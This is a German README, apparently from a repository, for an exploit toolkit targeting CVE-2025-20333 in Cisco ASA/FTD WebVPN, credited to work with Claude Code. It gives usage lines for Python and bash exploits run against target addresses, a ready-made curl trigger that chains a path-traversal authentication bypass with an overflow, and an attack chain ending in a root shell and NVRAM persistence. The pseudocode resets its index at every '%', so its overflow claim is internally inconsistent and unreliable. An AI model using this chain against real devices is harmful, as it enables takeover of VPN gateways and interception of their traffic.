
Vollständiges Forschungs- und Exploitation-Toolkit für CVE-2025-20333, einen kritischen Stack-Pufferüberlauf in Cisco ASA/FTD WebVPN. Enthält detaillierte Binäranalyse, PoC-Exploits in Python und bash sowie einen Exploitation-Leitfaden.
Dieses Verzeichnis enthält umfassende Forschung, Analyse und Proof-of-Concept-Code für CVE-2025-20333, eine kritische Stack-Pufferüberlauf-Schwachstelle in Cisco ASA/FTD WebVPN-Servern.
Status: ⚠️ Aktiv in freier Wildbahn ausgenutzt (ArcaneDoor-Kampagne)
CVSS-Score: 9,8 Kritisch
Authentifizierung: Nein (umgangen über CVE-2025-20362)
Auswirkung: Remote-Codeausführung als root
CVE-2025-20333-RESEARCH-NOTES.mdVollständige Reverse-Engineering-Forschung
Wichtigste Erkenntnis:
Fester 16-Byte-Puffer (local_58[16]) in body_lexer.re2c
URL-Decoding-Schleife hat KEINE GRENZPRÜFUNG
Schreiben auf local_58[iVar11] ohne Prüfung von iVar11 < 16
Nach 8 Hex-Paaren: Overflow → Stack-Korruption → RCE
EXPLOITATION-GUIDE.md (12 KB)Praktisches Exploitation-Handbuch
cve-2025-20333-poc.py (15 KB)Voll ausgestatteter Python-Exploit
Funktionen:
Verwendung:
# Schwachstellendetails anzeigen
python3 cve-2025-20333-poc.py --details
# Ziel ausnutzen
python3 cve-2025-20333-poc.py 192.168.1.100 443
# Benutzerdefinierte Einstellungen
python3 cve-2025-20333-poc.py firewall.example.com 8443 -t 30
cve-2025-20333-poc.sh (8,5 KB)Leichter Bash-Exploit
Funktionen:
Verwendung:
# Details anzeigen
./cve-2025-20333-poc.sh --details
# Exploit
./cve-2025-20333-poc.sh 192.168.1.100 443 10
# Manuell mit curl
curl -X POST https://target/+CSCOU+/../+CSCOE+/files/file_list.json \
-d "name=%2f%2f%2f%2f%2f%2f%2f%2f%2f" --insecure
| Eigenschaft | Wert |
|---|---|
| CVE-ID | CVE-2025-20333 |
| Typ | Stack-Pufferüberlauf (CWE-120) |
| Komponente | body_lexer.re2c (FUN_0302e690) |
| Betroffene Versionen | ASA 9.16–9.23, FTD 7.0–7.7 |
| CVSS v3.1 | 9,8 (Kritisch) |
| Authentifizierung | Nicht erforderlich (über CVE-2025-20362) |
| Benutzerinteraktion | Keine |
| Auswirkung | RCE als root, vollständige Systemkompromittierung |
| Status | Aktiv ausgenutzt (Mai 2025+) |
| Verantwortungsvolle Offenlegung | Cisco hat gepatcht; Advisory veröffentlicht |
// body_lexer.re2c - URL-Decoding-Schleife
byte local_58[16]; // ← Fester 16-Byte-Puffer
while (parsing_request_body) {
byte input = *data++;
if (input == '%') {
hex_decode_mode = true;
hex_index = 0;
}
if (hex_decode_mode) {
local_58[hex_index] = input; // ← KEINE GRENZPRÜFUNG!
hex_index++;
if (hex_index == 2) {
byte decoded = hex_pair_to_byte(local_58[0], local_58[1]);
hex_decode_mode = false;
}
}
}
Overflow-Auslöser: 9+ aufeinanderfolgende %XX-Sequenzen im POST-Body
1. Angreifer (KEINE AUTH erforderlich)
↓
2. HTTP POST an /+CSCOU+/../+CSCOE+/files/file_list.json
├─ CVE-2025-20362: Pfad-Traversal umgeht Auth-Prüfung
└─ Erreicht files_retr.lua-Endpunkt (auth_flag = 0)
↓
3. POST-Body: name=%2f%2f%2f%2f%2f%2f%2f%2f%2f
(9+ URL-kodierte Paare)
↓
4. body_lexer.re2c verarbeitet POST-Body
├─ Akkumuliert Hex-Paare in local_58[16]
└─ Nach 8 Paaren: OVERFLOW!
↓
5. Stack-Korruption
├─ Überschreibt local_48, local_40
├─ Überschreibt gespeichertes RBP
└─ Überschreibt gespeichertes RIP (Rücksprungadresse)
↓
6. Kontrollfluss-Übernahme
├─ RIP zeigt auf ROP-Gadgets
├─ ROP-Kette richtet execve() ein
└─ execve("/bin/sh", NULL, NULL)
↓
7. RCE als root (lina-Prozess läuft als root)
├─ Vollständige VPN-Server-Kompromittierung
├─ Zugriff auf den gesamten VPN-Verkehr
└─ Persistenz über NVRAM-Modifikation
lina-Binärdatei in Ghidra geöffnet/+CSCOU+/../+CSCOE+/files/file_list.json bestätigtlocal_58[16] ohne GrenzprüfungAutorisierung verifizieren
Exploit ausführen
# Schnellprüfung: Reagiert das Ziel auf den Exploit-Versuch?
python3 cve-2025-20333-poc.py <ziel_ip>
# Oder Bash-Version:
./cve-2025-20333-poc.sh <ziel_ip>
Exploitation verifizieren
Ergebnisse dokumentieren
Forschungsnotizen lesen
CVE-2025-20333-RESEARCH-NOTES.md studierenPoCs studieren
Anpassen & Erweitern
⚠️ RECHTLICHER HINWEIS
Dieses Toolkit wird nur für autorisierte Sicherheitstests bereitgestellt.
✅ Autorisierte Verwendung:
❌ Verbotene Verwendung:
cve-2025-20333/
├── README.md (diese Datei)
├── CVE-2025-20333-RESEARCH-NOTES.md (20 KB, umfassende Forschung)
├── EXPLOITATION-GUIDE.md (12 KB, praktischer Leitfaden)
├── cve-2025-20333-poc.py (15 KB, Python-PoC)
└── cve-2025-20333-poc.sh (8,5 KB, Bash-PoC)
Gesamtdokumentation: ~65 KB
Forschungstiefe: 50+ Ghidra-Funktionen geprüft
Verifizierte Ergebnisse: Pufferüberlauf in body_lexer.re2c bestätigt
# Testen, ob das Ziel für Exploitation anfällig ist
curl -X POST https://<ziel>/+CSCOU+/../+CSCOE+/files/file_list.json \
-d "name=%2f%2f%2f%2f%2f%2f%2f%2f%2f" \
--insecure \
-i
# Wenn das Ziel antwortet (200, 500, Absturz), könnte es anfällig sein
# Wenn das Ziel blockiert/umleitet, könnte es gepatcht sein
# Anfällige Versionen:
# - Cisco ASA 9.16 bis 9.23
# - Cisco FTD 7.0 bis 7.7
# SSH/Konsole verwenden, um ASA-Version zu prüfen:
show version
# Gepatchte Versionen:
# - ASA 9.16.4.51, 9.18.4.31, 9.20.4.49, 9.22.4.9, 9.24.1+
# - FTD 7.0.x, 7.1.x, 7.2.x (gepatcht)
Dieses Toolkit wird WIE BESEHEN nur für Bildungs- und autorisierte Testzwecke bereitgestellt.
Dieses Projekt wurde mit Unterstützung von Claude Code, dem KI-gestützten Coding-Assistenten von Anthropic, entwickelt.
Erstellt: 2026-08-23
Forschungszeitraum: 2026-08-22 bis 2026-08-23
Status: Vollständig & dokumentiert
Klassifizierung: Bildung / Nur autorisierte Tests